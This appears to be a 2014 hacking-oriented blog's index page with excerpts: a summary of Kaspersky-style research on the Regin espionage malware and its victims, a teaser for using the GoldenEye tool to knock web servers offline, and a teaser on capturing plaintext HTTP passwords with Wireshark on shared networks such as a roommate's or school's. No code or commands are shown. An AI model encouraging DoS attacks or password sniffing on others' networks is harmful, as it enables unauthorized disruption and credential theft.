Tuesday, November 25, 2014

Regin: Top-tier espionage tool enables stealthy surveillance

Read full details here: Regin: Top-tier espionage tool enables stealthy surveillance

An advanced piece of malware, known as Regin, has been used in systematic spying campaigns against a range of international targets since at least 2008. A back door-type Trojan, Regin is a complex piece of malware whose structure displays a degree of technical competence rarely seen. Customizable with an extensive range of capabilities depending on the target, it provides its controllers with a powerful framework for mass surveillance and has been used in spying operations against government organizations, infrastructure operators, businesses, researchers, and private individuals.
It is likely that its development took months, if not years, to complete and its authors have gone to great lengths to cover its tracks. Its capabilities and the level of resources behind Regin indicate that it is one of the main cyberespionage tools used by a nation state.
It’s unknown exactly when the first samples of Regin were created. Some of them have timestamps dating back to 2003.
The victims of Regin fall into the following categories:
  • Telecom operators
  • Government institutions
  • Multi-national political bodies
  • Financial institutions
  • Research institutions
  • Individuals involved in advanced mathematical/cryptographical research
So far, we’ve observed two main objectives from the attackers:
  • Intelligence gathering
  • Facilitating other types of attacks
While in most cases, the attackers were focused on extracting sensitive information, such as e-mails and documents, we have observed cases where the attackers compromised telecom operators to enable the launch of additional sophisticated attacks. More about this in the GSM Targeting section below.
Perhaps one of the most publicly known victims of Regin is Jean Jacques Quisquater (https://en.wikipedia.org/wiki/Jean-Jacques_Quisquater), a well-known Belgian cryptographer. In February 2014, Quisquater announced he was the victim of a sophisticated cyber intrusion incident. We were able to obtain samples from the Quisquater case and confirm they belong to the Regin platform.
Another interesting victim of Regin is a computer we are calling “The Magnet of Threats“. This computer belongs to a research institution and has been attacked by Turla, Mask/Careto, Regin, Itaduke, Animal Farm and some other advanced threats that do not have a public name, all co-existing happily on the same computer at some point.

Read the rest of it here: Regin: Top-tier espionage tool enables stealthy surveillance

Saturday, November 22, 2014

DoS website with GoldenEye – Layer 7 DoS tool with KeepAlive NoCache

It takes 15 seconds to bring down a web server! Tested GoldenEye Layer7 tool with KeepAlive NoCache.

I’ve talked about testing few DoS too tools that can put heavy load on HTTP servers in order to bring them to their knees by exhausting the resource pool. GoldenEye is the first of those tools and it is one of the newest I discovered in GitHub. You can DoS website with GoldenEye and bring it down almost within 30 seconds depending on how big their memory pool is. Of course, it wont work on protected servers and servers behind a proper WAF, IDS, but this is a great tool to test your own Web Server for load testing and amend your iptables/Firewall rules accordingly. I will put several warnings and disclaimers in this post so that even the most feeble minds wont be able to deny reading those.

Tuesday, November 11, 2014

Hack website password using WireShark

Read full details here: Hack website password using WireShark

Did you knew every time you fill in your username and password on a website and press ENTER, you are sending your password. Well, of course you know that. How else you’re going to authenticate yourself to the website?? But, (yes, there’s a small BUT here).. when a website allows you to authenticate using HTTP (PlainText), it is very simple to capture that traffic and later analyze that from any machine over LAN (and even Internet). That means someone can hack website password for any site that is using HTTP protocol for authentication.

Well, to do it over Internet, you need to be able to sit on a Gateway or central HUB (BGP routers would do – if you go access and the traffic is routed via that).

But to do it from a LAN is easy and at the same time makes you wonder, how insecure HTTP really is. You could be doing to to your roommate, Work Network or even School, College, University network assuming the network allows broadcast traffic and your LAN card can be set to promiscuous mode.
So lets try this on a simple website.

I will hide part of the website name (just for the fact that they are nice people and I respect their privacy.). For the sake of this guide, I will just show everything done on a single machine. As for you, try it between two VirtualBox/VMWare/Physical machines.
p.s. Note that some routers doesn’t broadcast traffic, so it might fail for those particular ones.

Read the rest of it here: Hack website password using WireShark

Wednesday, November 5, 2014

No internet for me!

Read full details here: No internet for me!

No Internet for me!!!
I am moving to a much faster Fibre connection, so temporarily living on a Mobile Internet.
This was me for first few hours:

Then this happened!


  Feel free to comment via my Facebook or Twitter account in the meantime.

Enjoy and stay safe everyone.

Read the rest of it here: No internet for me!